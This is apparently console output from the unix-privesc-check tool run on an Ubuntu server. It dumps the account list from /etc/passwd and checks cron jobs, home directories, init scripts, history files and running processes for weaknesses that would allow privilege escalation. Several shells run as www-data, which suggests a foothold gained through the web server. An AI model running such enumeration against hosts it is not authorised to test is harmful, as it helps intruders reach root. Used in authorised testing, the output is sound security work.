Processing crontab run-parts entry: 17 * * * * root cd / && run-parts --report /etc/cron.hourly
Checking if anyone except root can change /etc/cron.hourly
Checking directory: /etc/cron.hourly
No files in this directory.
Processing crontab run-parts entry: 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
Checking if anyone except root can change /etc/cron.daily
Checking directory: /etc/cron.daily
Checking if anyone except root can change /etc/cron.daily/apache2
Checking if anyone except root can change /etc/cron.daily/apport
Checking if anyone except root can change /etc/cron.daily/apt-compat
Checking if anyone except root can change /etc/cron.daily/bsdmainutils
Checking if anyone except root can change /etc/cron.daily/cracklib-runtime
Checking if anyone except root can change /etc/cron.daily/dpkg
Checking if anyone except root can change /etc/cron.daily/logrotate
Checking if anyone except root can change /etc/cron.daily/man-db
Checking if anyone except root can change /etc/cron.daily/popularity-contest
Checking if anyone except root can change /etc/cron.daily/samba
Checking if anyone except root can change /etc/cron.daily/update-notifier-common
Processing crontab run-parts entry: 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
Checking if anyone except root can change /etc/cron.weekly
Checking directory: /etc/cron.weekly
Checking if anyone except root can change /etc/cron.weekly/man-db
Checking if anyone except root can change /etc/cron.weekly/update-notifier-common
Processing crontab run-parts entry: 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
Checking if anyone except root can change /etc/cron.monthly
Checking directory: /etc/cron.monthly
No files in this directory.
Processing crontab entry: 17 * * * * root cd / && run-parts --report /etc/cron.hourly
ERROR: Can't find absolute path for cd. Skipping.
Processing crontab entry: 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
Checking if anyone except root can change /bin/test
Processing crontab entry: 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
Checking if anyone except root can change /bin/test
Processing crontab entry: 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
Checking if anyone except root can change /bin/test
############################################
Checking cron job programs aren't writable (/var/spool/cron/crontabs)
############################################
No user crontabs found in /var/spool/cron/crontabs. Skipping checks.
############################################
Checking cron job programs aren't writable (/var/spool/cron/tabs)
############################################
Directory /var/spool/cron/tabs is not present. Skipping checks.
############################################
Checking inetd programs aren't writable
############################################
File /etc/inetd.conf not present. Skipping checks.
############################################
Checking xinetd programs aren't writeable
############################################
Directory /etc/xinetd.d not present. Skipping checks.
############################################
Checking home directories aren't writable
############################################
Processing /etc/passwd line: root:x:0:0:root:/root:/bin/bash
Checking if anyone except root can change /root
Processing /etc/passwd line: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
Checking if anyone except daemon can change /usr/sbin
Processing /etc/passwd line: bin:x:2:2:bin:/bin:/usr/sbin/nologin
Checking if anyone except bin can change /bin
Processing /etc/passwd line: sys:x:3:3:sys:/dev:/usr/sbin/nologin
Checking if anyone except sys can change /dev
Processing /etc/passwd line: sync:x:4:65534:sync:/bin:/bin/sync
Checking if anyone except sync can change /bin
Processing /etc/passwd line: games:x:5:60:games:/usr/games:/usr/sbin/nologin
Checking if anyone except games can change /usr/games
Processing /etc/passwd line: man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
Checking if anyone except man can change /var/cache/man
Processing /etc/passwd line: lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
Checking if anyone except lp can change /var/spool/lpd
Processing /etc/passwd line: mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
Checking if anyone except mail can change /var/mail
Processing /etc/passwd line: news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
Checking if anyone except news can change /var/spool/news
Processing /etc/passwd line: uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
Checking if anyone except uucp can change /var/spool/uucp
Processing /etc/passwd line: proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
Checking if anyone except proxy can change /bin
Processing /etc/passwd line: www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
Checking if anyone except www-data can change /var/www
Processing /etc/passwd line: backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
Checking if anyone except backup can change /var/backups
Processing /etc/passwd line: list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
Checking if anyone except list can change /var/list
Processing /etc/passwd line: irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
Checking if anyone except irc can change /var/run/ircd
Processing /etc/passwd line: gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
Checking if anyone except gnats can change /var/lib/gnats
Processing /etc/passwd line: nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
Checking if anyone except nobody can change /nonexistent
Processing /etc/passwd line: systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
Checking if anyone except systemd-network can change /run/systemd
Processing /etc/passwd line: systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
Checking if anyone except systemd-resolve can change /run/systemd
Processing /etc/passwd line: systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
Checking if anyone except systemd-timesync can change /run/systemd
Processing /etc/passwd line: messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
Checking if anyone except messagebus can change /nonexistent
Processing /etc/passwd line: syslog:x:104:110::/home/syslog:/usr/sbin/nologin
Checking if anyone except syslog can change /home/syslog
Processing /etc/passwd line: _apt:x:105:65534::/nonexistent:/usr/sbin/nologin
Checking if anyone except _apt can change /nonexistent
Processing /etc/passwd line: tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
Skipping user tss. They don't have a shell.
Processing /etc/passwd line: uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
Checking if anyone except uuidd can change /run/uuidd
Processing /etc/passwd line: tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
Checking if anyone except tcpdump can change /nonexistent
Processing /etc/passwd line: sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
Checking if anyone except sshd can change /run/sshd
Processing /etc/passwd line: landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin
Checking if anyone except landscape can change /var/lib/landscape
Processing /etc/passwd line: pollinate:x:111:1::/var/cache/pollinate:/bin/false
Skipping user pollinate. They don't have a shell.
Processing /etc/passwd line: ec2-instance-connect:x:112:65534::/nonexistent:/usr/sbin/nologin
Checking if anyone except ec2-instance-connect can change /nonexistent
Processing /etc/passwd line: systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
Checking if anyone except systemd-coredump can change /
Processing /etc/passwd line: ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
Checking if anyone except ubuntu can change /home/ubuntu
Processing /etc/passwd line: lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
Skipping user lxd. They don't have a shell.
Processing /etc/passwd line: rtkit:x:113:119:RealtimeKit,,,:/proc:/usr/sbin/nologin
Checking if anyone except rtkit can change /proc
Processing /etc/passwd line: xrdp:x:114:122::/run/xrdp:/usr/sbin/nologin
Checking if anyone except xrdp can change /run/xrdp
Processing /etc/passwd line: dnsmasq:x:115:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
Checking if anyone except dnsmasq can change /var/lib/misc
Processing /etc/passwd line: usbmux:x:116:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
Checking if anyone except usbmux can change /var/lib/usbmux
Processing /etc/passwd line: avahi:x:117:123:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
Checking if anyone except avahi can change /var/run/avahi-daemon
Processing /etc/passwd line: cups-pk-helper:x:118:124:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
Checking if anyone except cups-pk-helper can change /home/cups-pk-helper
Processing /etc/passwd line: pulse:x:119:125:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
Checking if anyone except pulse can change /var/run/pulse
Processing /etc/passwd line: geoclue:x:120:127::/var/lib/geoclue:/usr/sbin/nologin
Checking if anyone except geoclue can change /var/lib/geoclue
Processing /etc/passwd line: saned:x:121:129::/var/lib/saned:/usr/sbin/nologin
Checking if anyone except saned can change /var/lib/saned
Processing /etc/passwd line: colord:x:122:130:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
Checking if anyone except colord can change /var/lib/colord
Processing /etc/passwd line: sddm:x:123:131:Simple Desktop Display Manager:/var/lib/sddm:/bin/false
Skipping user sddm. They don't have a shell.
Processing /etc/passwd line: gdm:x:124:132:Gnome Display Manager:/var/lib/gdm3:/bin/false
Skipping user gdm. They don't have a shell.
Processing /etc/passwd line: auditor:x:1001:1001::/home/auditor:/bin/bash
Checking if anyone except auditor can change /home/auditor
Processing /etc/passwd line: dbadmin:x:1002:1002::/home/dbadmin:/bin/bash
Checking if anyone except dbadmin can change /home/dbadmin
Processing /etc/passwd line: mysql:x:125:133:MySQL Server,,,:/nonexistent:/bin/false
Skipping user mysql. They don't have a shell.
Processing /etc/passwd line: ftp:x:126:137:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
Checking if anyone except ftp can change /srv/ftp
############################################
Checking for readable sensitive files in home directories
############################################
Checking if anyone except ubuntu can read file /home/ubuntu/.bash_history
Checking if anyone except auditor can read file /home/auditor/.bash_history
############################################
Checking SUID programs
############################################
Skipping checks of SUID programs (it's slow!). Run again in 'detailed' mode.
############################################
Checking for Private SSH Keys home directories
############################################
############################################
Checking for Public SSH Keys home directories
############################################
############################################
Checking for SSH agents
############################################
No SSH agents found
############################################
Checking for GPG agents
############################################
No GPG agents found
############################################
Checking startup files (init.d / rc.d) aren't writable
############################################
Processing startup script /etc/init.d/acpid
Checking if anyone except root can change /etc/init.d/acpid
Processing startup script /etc/init.d/apache-htcacheclean
Checking if anyone except root can change /etc/init.d/apache-htcacheclean
Processing startup script /etc/init.d/apache2
Checking if anyone except root can change /etc/init.d/apache2
Processing startup script /etc/init.d/apparmor
Checking if anyone except root can change /etc/init.d/apparmor
Processing startup script /etc/init.d/apport
Checking if anyone except root can change /etc/init.d/apport
Processing startup script /etc/init.d/atd
Checking if anyone except root can change /etc/init.d/atd
Processing startup script /etc/init.d/avahi-daemon
Checking if anyone except root can change /etc/init.d/avahi-daemon
Processing startup script /etc/init.d/bluetooth
Checking if anyone except root can change /etc/init.d/bluetooth
Processing startup script /etc/init.d/console-setup.sh
Checking if anyone except root can change /etc/init.d/console-setup.sh
Processing startup script /etc/init.d/cron
Checking if anyone except root can change /etc/init.d/cron
Processing startup script /etc/init.d/cryptdisks
Checking if anyone except root can change /etc/init.d/cryptdisks
Processing startup script /etc/init.d/cryptdisks-early
Checking if anyone except root can change /etc/init.d/cryptdisks-early
Processing startup script /etc/init.d/dbus
Checking if anyone except root can change /etc/init.d/dbus
Processing startup script /etc/init.d/gdm3
Checking if anyone except root can change /etc/init.d/gdm3
Processing startup script /etc/init.d/grub-common
Checking if anyone except root can change /etc/init.d/grub-common
Processing startup script /etc/init.d/haveged
Checking if anyone except root can change /etc/init.d/haveged
Processing startup script /etc/init.d/hibagent
Checking if anyone except root can change /etc/init.d/hibagent
Processing startup script /etc/init.d/hwclock.sh
Checking if anyone except root can change /etc/init.d/hwclock.sh
Processing startup script /etc/init.d/irqbalance
Checking if anyone except root can change /etc/init.d/irqbalance
Processing startup script /etc/init.d/iscsid
Checking if anyone except root can change /etc/init.d/iscsid
Processing startup script /etc/init.d/keyboard-setup.sh
Checking if anyone except root can change /etc/init.d/keyboard-setup.sh
Processing startup script /etc/init.d/kmod
Checking if anyone except root can change /etc/init.d/kmod
Processing startup script /etc/init.d/lvm2
Checking if anyone except root can change /etc/init.d/lvm2
Processing startup script /etc/init.d/lvm2-lvmpolld
Checking if anyone except root can change /etc/init.d/lvm2-lvmpolld
Processing startup script /etc/init.d/multipath-tools
Checking if anyone except root can change /etc/init.d/multipath-tools
Processing startup script /etc/init.d/mysql
Checking if anyone except root can change /etc/init.d/mysql
Processing startup script /etc/init.d/network-manager
Checking if anyone except root can change /etc/init.d/network-manager
Processing startup script /etc/init.d/nmbd
Checking if anyone except root can change /etc/init.d/nmbd
Processing startup script /etc/init.d/open-iscsi
Checking if anyone except root can change /etc/init.d/open-iscsi
Processing startup script /etc/init.d/open-vm-tools
Checking if anyone except root can change /etc/init.d/open-vm-tools
Processing startup script /etc/init.d/php7.4-fpm
Checking if anyone except root can change /etc/init.d/php7.4-fpm
Processing startup script /etc/init.d/plymouth
Checking if anyone except root can change /etc/init.d/plymouth
Processing startup script /etc/init.d/plymouth-log
Checking if anyone except root can change /etc/init.d/plymouth-log
Processing startup script /etc/init.d/pppd-dns
Checking if anyone except root can change /etc/init.d/pppd-dns
Processing startup script /etc/init.d/preload
Checking if anyone except root can change /etc/init.d/preload
Processing startup script /etc/init.d/procps
Checking if anyone except root can change /etc/init.d/procps
Processing startup script /etc/init.d/pulseaudio-enable-autospawn
Checking if anyone except root can change /etc/init.d/pulseaudio-enable-autospawn
Processing startup script /etc/init.d/rsync
Checking if anyone except root can change /etc/init.d/rsync
Processing startup script /etc/init.d/rsyslog
Checking if anyone except root can change /etc/init.d/rsyslog
Processing startup script /etc/init.d/samba-ad-dc
Checking if anyone except root can change /etc/init.d/samba-ad-dc
Processing startup script /etc/init.d/saned
Checking if anyone except root can change /etc/init.d/saned
Processing startup script /etc/init.d/screen-cleanup
Checking if anyone except root can change /etc/init.d/screen-cleanup
Processing startup script /etc/init.d/sddm
Checking if anyone except root can change /etc/init.d/sddm
Processing startup script /etc/init.d/smbd
Checking if anyone except root can change /etc/init.d/smbd
Processing startup script /etc/init.d/ssh
Checking if anyone except root can change /etc/init.d/ssh
Processing startup script /etc/init.d/ubuntu-fan
Checking if anyone except root can change /etc/init.d/ubuntu-fan
Processing startup script /etc/init.d/udev
Checking if anyone except root can change /etc/init.d/udev
Processing startup script /etc/init.d/ufw
Checking if anyone except root can change /etc/init.d/ufw
Processing startup script /etc/init.d/unattended-upgrades
Checking if anyone except root can change /etc/init.d/unattended-upgrades
Processing startup script /etc/init.d/uuidd
Checking if anyone except root can change /etc/init.d/uuidd
Processing startup script /etc/init.d/vsftpd
Checking if anyone except root can change /etc/init.d/vsftpd
Processing startup script /etc/init.d/x11-common
Checking if anyone except root can change /etc/init.d/x11-common
Processing startup script /etc/init.d/xrdp
Checking if anyone except root can change /etc/init.d/xrdp
############################################
Checking if running programs are writable
############################################
------------------------
PID: 1
Owner: root
Program path: /sbin/init
Checking if anyone except root can change /sbin/init
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 10
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 100
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 101
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 102
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 103
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 104
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 105
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 1063
Owner: root
Program path: /usr/sbin/apache2
Checking if anyone except root can change /usr/sbin/apache2
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 107
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 108
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 109
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 11
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 118
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 12
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 121
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 122
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 127
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 128
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 129
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 13
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 130
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 14
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 15
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 16
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 1633
Owner: root
Program path: /usr/bin/dockerd
Checking if anyone except root can change /usr/bin/dockerd
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 1637
Owner: root
Program path: /usr/sbin/smbd
Checking if anyone except root can change /usr/sbin/smbd
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 1638
Owner: www-data
Program path: /usr/sbin/apache2
Checking if anyone except www-data can change /usr/sbin/apache2
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 1639
Owner: www-data
Program path: /usr/sbin/apache2
Checking if anyone except www-data can change /usr/sbin/apache2
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 1640
Owner: www-data
Program path: /usr/sbin/apache2
Checking if anyone except www-data can change /usr/sbin/apache2
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 1641
Owner: www-data
Program path: /usr/sbin/apache2
Checking if anyone except www-data can change /usr/sbin/apache2
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 1642
Owner: www-data
Program path: /usr/sbin/apache2
Checking if anyone except www-data can change /usr/sbin/apache2
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 1644
Owner: root
Program path: /usr/sbin/smbd
Checking if anyone except root can change /usr/sbin/smbd
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 1645
Owner: root
Program path: /usr/sbin/smbd
Checking if anyone except root can change /usr/sbin/smbd
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 1662
Owner: root
Program path: /usr/sbin/smbd
Checking if anyone except root can change /usr/sbin/smbd
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 17
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 172
Owner: root
Program path: /lib/systemd/systemd-journald
Checking if anyone except root can change /lib/systemd/systemd-journald
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 172988
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 1757
ERROR: Can't find full path of running program: bpfilter_umh
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 18
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 19
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 1969
ERROR: Can't find full path of running program: sshd: /usr/sbin/sshd -D -o AuthorizedKeysCommand /usr/share/ec2-instance-connect/eic_run_authorized_keys %u %f -o AuthorizedKeysCommandUser ec2-instance-connect [listener] 0 of 10-100 startups
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 2
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 20
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 204
Owner: root
Program path: /lib/systemd/systemd-udevd
Checking if anyone except root can change /lib/systemd/systemd-udevd
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 2076
Owner: root
Program path: /snap/amazon-ssm-agent/5163/ssm-agent-worker
Checking if anyone except root can change /snap/amazon-ssm-agent/5163/ssm-agent-worker
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 209769
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 22
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 227377
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 23
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 230
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 238524
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 24
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 245565
Owner: www-data
Program path: /usr/bin/dash
Checking if anyone except www-data can change /usr/bin/dash
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 245566
Owner: www-data
Program path: /usr/bin/php7.4
Checking if anyone except www-data can change /usr/bin/php7.4
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 25
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 251334
Owner: www-data
Program path: /usr/bin/dash
Checking if anyone except www-data can change /usr/bin/dash
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 251335
Owner: www-data
Program path: /usr/bin/dash
Checking if anyone except www-data can change /usr/bin/dash
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 251336
Owner: www-data
Program path: /usr/bin/bash
Checking if anyone except www-data can change /usr/bin/bash
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 252314
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 253825
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 258141
Owner: www-data
Program path: /usr/bin/dash
Checking if anyone except www-data can change /usr/bin/dash
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 258142
Owner: www-data
Program path: /usr/bin/dash
Checking if anyone except www-data can change /usr/bin/dash
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 258622
Owner: www-data
Program path: /usr/bin/bash
Checking if anyone except www-data can change /usr/bin/bash
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 26
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 27
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 278294
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 28
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 281652
Owner: www-data
Program path: /usr/bin/dash
Checking if anyone except www-data can change /usr/bin/dash
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 281653
Owner: www-data
Program path: /usr/bin/dash
Checking if anyone except www-data can change /usr/bin/dash
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 282133
Owner: www-data
Program path: /usr/bin/bash
Checking if anyone except www-data can change /usr/bin/bash
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 284056
Owner: www-data
Program path: /usr/bin/dash
Checking if anyone except www-data can change /usr/bin/dash
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 28492
Owner: www-data
Program path: /usr/sbin/apache2
Checking if anyone except www-data can change /usr/sbin/apache2
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 29
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 3
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 30
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 301
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 302
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 303
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 304
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 305
Owner: root
Program path: /sbin/multipathd
Checking if anyone except root can change /sbin/multipathd
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 31
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 314
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 316
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 32
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 320
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 322
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 323
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 328
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 331
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 335
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 345
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 350
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 368
Owner: systemd-timesync
Program path: /lib/systemd/systemd-timesyncd
Checking if anyone except systemd-timesync can change /lib/systemd/systemd-timesyncd
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 381
Owner: root
Program path: /usr/sbin/haveged
Checking if anyone except root can change /usr/sbin/haveged
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 4
ERROR: Can't find full path of running program:
Owner: root
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 450
Owner: systemd-network
Program path: /lib/systemd/systemd-networkd
Checking if anyone except systemd-network can change /lib/systemd/systemd-networkd
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 452
Owner: systemd-resolve
Program path: /lib/systemd/systemd-resolved
Checking if anyone except systemd-resolve can change /lib/systemd/systemd-resolved
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 497
Owner: root
Program path: /usr/lib/accountsservice/accounts-daemon
Checking if anyone except root can change /usr/lib/accountsservice/accounts-daemon
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 498
Owner: root
Program path: /usr/sbin/acpid
Checking if anyone except root can change /usr/sbin/acpid
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 499
ERROR: Can't find full path of running program: avahi-daemon: running [ip-192-168-100-52.local]
Owner: avahi
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 500
Owner: messagebus
Program path: /usr/bin/dbus-daemon
Checking if anyone except messagebus can change /usr/bin/dbus-daemon
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 501
Owner: root
Program path: /usr/sbin/NetworkManager
Checking if anyone except root can change /usr/sbin/NetworkManager
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 507
Owner: root
Program path: /usr/sbin/irqbalance
Checking if anyone except root can change /usr/sbin/irqbalance
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 508
Owner: root
Program path: /usr/bin/python3
Checking if anyone except root can change /usr/bin/python3
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 512
Owner: root
Program path: /usr/lib/policykit-1/polkitd
Checking if anyone except root can change /usr/lib/policykit-1/polkitd
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 514
Owner: syslog
Program path: /usr/sbin/rsyslogd
Checking if anyone except syslog can change /usr/sbin/rsyslogd
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
PID: 523
Owner: root
Program path: /usr/lib/snapd/snapd
Checking if anyone except root can change /usr/lib/snapd/snapd
./unix-privesc-check: 1076: [: standard: unexpected operator
------------------------
